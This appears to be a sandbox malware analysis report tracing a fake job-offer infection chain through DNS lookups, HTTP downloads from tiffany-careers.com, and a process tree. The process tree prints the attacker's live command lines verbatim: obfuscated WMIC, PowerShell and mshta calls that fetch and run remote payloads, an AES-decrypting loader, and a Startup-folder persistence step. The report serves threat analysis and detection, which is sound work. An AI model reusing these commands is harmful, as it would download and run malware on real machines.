Dec 23, 2024 07:11:58.223584890 CET | 192.168.2.5 | 1.1.1.1 | 0xd9b4 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:12:07.320462942 CET | 192.168.2.5 | 1.1.1.1 | 0xc65b | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:12:25.160470009 CET | 192.168.2.5 | 1.1.1.1 | 0xa0c3 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 07:11:32.847862959 CET | 1.1.1.1 | 192.168.2.5 | 0x757b | No error (0) | tiffany-careers.com | | 147.45.49.155 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:11:58.363641977 CET | 1.1.1.1 | 192.168.2.5 | 0xd9b4 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:12:07.458822012 CET | 1.1.1.1 | 192.168.2.5 | 0xc65b | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:12:25.298820019 CET | 1.1.1.1 | 192.168.2.5 | 0xa0c3 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
• tiffany-careers.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 147.45.49.155 | 443 | 1988 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:11:34 UTC | 332 | OUT | GET /baochuan1 HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:11:35 UTC | 397 | IN | HTTP/1.1 200 OK
etag: "6bcfb-67671134-23c46;;;"
last-modified: Sat, 21 Dec 2024 19:04:20 GMT
content-length: 441595
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:11:34 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 147.45.49.155 | 443 | 2608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:11:40 UTC | 88 | OUT | GET /Job_Description.pdf HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:11:40 UTC | 430 | IN | HTTP/1.1 200 OK
etag: "347816-67604c7c-2538f;;;"
last-modified: Mon, 16 Dec 2024 15:51:24 GMT
content-type: application/pdf
content-length: 3438614
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:11:40 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49714 | 147.45.49.155 | 443 | 2608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:11:49 UTC | 58 | OUT | GET /rMpqCJnPv.exe HTTP/1.1
Host: tiffany-careers.com
2024-12-23 06:11:49 UTC | 439 | IN | HTTP/1.1 200 OK
etag: "108a00-676710df-23c45;;;"
last-modified: Sat, 21 Dec 2024 19:02:55 GMT
content-type: application/x-executable
content-length: 1083904
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:11:49 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49740 | 147.45.49.155 | 443 | 7988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:11:56 UTC | 171 | OUT | GET /gIpBYOi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:11:57 UTC | 397 | IN | HTTP/1.1 200 OK
etag: "da2a8-67671061-23c44;;;"
last-modified: Sat, 21 Dec 2024 19:00:49 GMT
content-length: 893608
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:11:57 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49759 | 147.45.49.155 | 443 | 7728 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:12:01 UTC | 80 | OUT | GET /ygUmFny.txt HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-23 06:12:02 UTC | 425 | IN | HTTP/1.1 200 OK
etag: "119282-6767105a-23c2d;;;"
last-modified: Sat, 21 Dec 2024 19:00:42 GMT
content-type: text/plain
content-length: 1151618
accept-ranges: bytes
date: Mon, 23 Dec 2024 06:12:02 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


                                                                                                                  Target ID:0
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
                                                                                                                  Imagebase:0x7ff701b90000
                                                                                                                  File size:576'000 bytes
                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:01:11:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:01:11:31
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1
                                                                                                                  Imagebase:0x7ff7eeb30000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  Target ID:7
                                                                                                                  Start time:01:11:34
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:8
                                                                                                                  Start time:01:11:36
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:01:11:36
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:12
                                                                                                                  Start time:01:11:46
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
                                                                                                                  Imagebase:0x7ff686a00000
                                                                                                                  File size:5'641'176 bytes
                                                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:13
                                                                                                                  Start time:01:11:46
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                  Imagebase:0x7ff6413e0000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:14
                                                                                                                  Start time:01:11:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                  Imagebase:0x7ff6413e0000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:15
                                                                                                                  Start time:01:11:51
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\rMpqCJnPv.exe"
                                                                                                                  Imagebase:0x7ff7bb7e0000
                                                                                                                  File size:1'083'904 bytes
                                                                                                                  MD5 hash:7E279E8E3DCD0BCD240E36D7317924D3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 30%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:01:11:52
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:01:11:52
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:01:11:58
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:01:11:58
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:01:12:03
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                  Imagebase:0xde0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:23
                                                                                                                  Start time:01:12:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:01:12:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:01:12:16
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                  Imagebase:0x7ff794d10000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:01:12:17
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                  Imagebase:0x870000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2091933957.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:12.1%
                                                                                                                    Total number of Nodes:1478
                                                                                                                    Total number of Limit Nodes:46
API calls 94963->94966 94964->94963 94965 7ff7bb86a7a7 94964->94965 94967 7ff7bb7e98e8 4 API calls 94965->94967 94966->94961 94968 7ff7bb86a7b5 94967->94968 94970 7ff7bb7ee0a8 4 API calls 94968->94970 94971 7ff7bb86a85c 94969->94971 94972 7ff7bb86a7c2 94970->94972 94971->94947 94974 7ff7bb7e7ab8 CloseHandle 94971->94974 94973 7ff7bb7e71f8 4 API calls 94972->94973 94975 7ff7bb86a7d3 94973->94975 94974->94947 94976 7ff7bb85b3a8 12 API calls 94975->94976 94976->94961 94978 7ff7bb867e79 94977->94978 94979 7ff7bb7e9640 4 API calls 94978->94979 94980 7ff7bb867f55 Concurrency::wait 94978->94980 94981 7ff7bb867ea6 94979->94981 94982 7ff7bb7e834c 5 API calls 94980->94982 95005 7ff7bb867fe5 94980->95005 94983 7ff7bb7e9640 4 API calls 94981->94983 94984 7ff7bb867f99 94982->94984 94986 7ff7bb867eaf 94983->94986 94985 7ff7bb7ed4cc 48 API calls 94984->94985 94987 7ff7bb867fab 94985->94987 94988 7ff7bb7ed4cc 48 API calls 94986->94988 94989 7ff7bb7e6838 16 API calls 94987->94989 94990 7ff7bb867ebe 94988->94990 94992 7ff7bb867fba 94989->94992 95149 7ff7bb7e74ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94990->95149 94994 7ff7bb867fbe GetLastError 94992->94994 94998 7ff7bb867ff5 94992->94998 94993 7ff7bb867ed8 95150 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94993->95150 94996 7ff7bb867fd8 94994->94996 95001 7ff7bb7e7ab8 CloseHandle 94996->95001 94996->95005 94997 7ff7bb867f07 94997->94980 95151 7ff7bb85bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94997->95151 94999 7ff7bb7e9640 4 API calls 94998->94999 95002 7ff7bb868035 94999->95002 95001->95005 95002->95005 95153 7ff7bb850d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95002->95153 95003 7ff7bb867f17 95003->94980 95004 7ff7bb867f1b 95003->95004 95007 7ff7bb7eec00 4 API calls 95004->95007 95005->94886 95008 7ff7bb867f28 95007->95008 95152 7ff7bb85bab8 8 API calls 
Concurrency::wait 95008->95152 95010 7ff7bb867f31 Concurrency::wait 95010->94980 95154 7ff7bb87f630 95011->95154 95013 7ff7bb87f1cd 95013->94886 95014 7ff7bb87f182 95014->95013 95222 7ff7bb7eee20 5 API calls Concurrency::wait 95014->95222 95017 7ff7bb87f630 164 API calls 95016->95017 95018 7ff7bb87f0c2 95017->95018 95018->94886 95028 7ff7bb7f3c80 95019->95028 95020 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95020->95028 95021 7ff7bb8405be 95253 7ff7bb8634e4 77 API calls 3 library calls 95021->95253 95023 7ff7bb8405d1 95023->94886 95024 7ff7bb7f4aa9 95026 7ff7bb7f4ac0 95024->95026 95030 7ff7bb7ee0a8 4 API calls 95024->95030 95026->94886 95027 7ff7bb7f4fe7 95032 7ff7bb7ee0a8 4 API calls 95027->95032 95028->95020 95028->95021 95028->95024 95028->95027 95029 7ff7bb7f3dde 95028->95029 95033 7ff7bb7ee0a8 4 API calls 95028->95033 95034 7ff7bb7f4a8f 95028->95034 95037 7ff7bb804f0c 34 API calls __scrt_initialize_thread_safe_statics 95028->95037 95038 7ff7bb7e9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95028->95038 95039 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95028->95039 95251 7ff7bb7f5360 300 API calls Concurrency::wait 95028->95251 95252 7ff7bb8634e4 77 API calls 3 library calls 95028->95252 95029->94886 95030->95029 95031 7ff7bb83fefe 95035 7ff7bb7ee0a8 4 API calls 95031->95035 95032->95029 95033->95028 95034->95024 95034->95026 95034->95031 95035->95026 95037->95028 95038->95028 95039->95028 95042->94873 95043->94878 95044->94878 95045->94864 95046->94885 95047->94885 95048->94886 95049->94885 95053 7ff7bb85c7c0 lstrlenW 95050->95053 95054 7ff7bb85bdf5 95053->95054 95055 7ff7bb85c7dd GetFileAttributesW 95053->95055 95054->94904 95055->95054 95056 7ff7bb85c7eb FindFirstFileW 95055->95056 95056->95054 95057 7ff7bb85c7ff FindClose 95056->95057 95057->95054 95061 7ff7bb7e82e4 95058->95061 95066 7ff7bb7e8314 
